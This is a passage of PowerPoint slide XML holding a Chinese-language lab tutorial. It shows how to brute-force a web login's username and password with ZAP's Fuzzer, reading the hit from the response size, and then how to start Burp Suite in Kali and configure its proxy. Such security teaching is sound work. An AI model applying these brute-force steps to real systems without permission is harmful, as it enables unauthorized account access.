              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（4）选取左侧窗口里username的值test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>,点击右侧Add按钮，出现Payloads对话框</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，在Payloads对话框中，点击Add按钮，出现Add Payload对话框，点击类型选择下拉列表，选择String，并输入几个常用的用户名，作为Payloads项，点击添加，同理，添加password的Payload项。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>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32"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2493645" y="2832735"/>
            <a:ext cx="5933440" cy="3944620"/>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34135"/>
            <a:ext cx="11108690" cy="996315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）设置好用户名和密码的Payloads后，在Fuzzer界面的右边fuzz locations会显示刚</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>选择两个破解项。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>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88"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2302510" y="2218055"/>
            <a:ext cx="7586345" cy="4082415"/>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1108690" cy="1145540"/>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6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、模糊测试</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）设置好用户名和密码的Payloads后，在Fuzzer界面的右边fuzz locations会显示刚选择两个破解项，点击Start Fuzzer按钮，开始模糊测试。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 88"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2159000" y="2434590"/>
            <a:ext cx="7630795" cy="425323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49375"/>
            <a:ext cx="11172190" cy="1169035"/>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altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>7、查看结果</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在Size Resp.Body项（数据包大小），通过排序，可见到只有一条是4.641bytes，其他都是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>4.575bytes，不同的那条数据就是我们破解出来的正确用户名和密码。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="组合 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1169670" y="2620645"/>
            <a:ext cx="9595485" cy="2908935"/>
            <a:chOff x="385" y="7276"/>
            <a:chExt cx="14012" cy="3054"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8" name="图片 48"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId4"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="385" y="7276"/>
              <a:ext cx="14013" cy="3054"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="圆角矩形 9"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId6"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7976" y="8380"/>
              <a:ext cx="1658" cy="608"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="标题 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>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0976610" cy="1129665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>尝试</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>使用该用户名、密码登陆</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>查看请求和响应报文。发现响应报文中有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Welcome to the password protected area admin”这样一句话，显然破解成功</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>尝试使用该用户名、密码登陆，显示成功</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 42"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect t="3824"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2635885" y="2540000"/>
            <a:ext cx="6844030" cy="325501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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2800">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>二</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2800">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>使用ZAP</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5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="1315085"/>
            <a:ext cx="11017885" cy="108204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sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1、启动Burp Suite</a:t>
            </a:r>
            <a:endPar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sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在</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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Kali</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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>主界面中</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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，点击左上角的应用程序图标</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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，点击03-Web程序，点击burpsuite，即可启动</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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>burpsuite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>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2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6097270" y="1819275"/>
            <a:ext cx="266700" cy="266700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3484880" y="2164080"/>
            <a:ext cx="3349625" cy="4432300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="标题 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId8"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 -2147482547"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect r="-3349" b="29046"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1038225" y="1767205"/>
            <a:ext cx="9495790" cy="4799965"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="1315085"/>
            <a:ext cx="11017885" cy="45212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sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2、Burp Suite界面</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>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1275"/>
            <a:ext cx="11090275" cy="1422400"/>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sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3、使用Proxy（代理）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>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sz="2000">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（1）设置Burp Suite代理</a:t>
            </a:r>
            <a:endParaRPr sz="2000" b="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Burp Suite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>界面中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，选择Proxy模块，选择Options选项卡，在Options选项卡中，采用默认设置，即代理监听的地址是127.0.0.1，端口是8080。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2000" b="0">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79"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1080770" y="2802255"/>
            <a:ext cx="9946640" cy="3271520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>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1275"/>
            <a:ext cx="10855325" cy="1734185"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
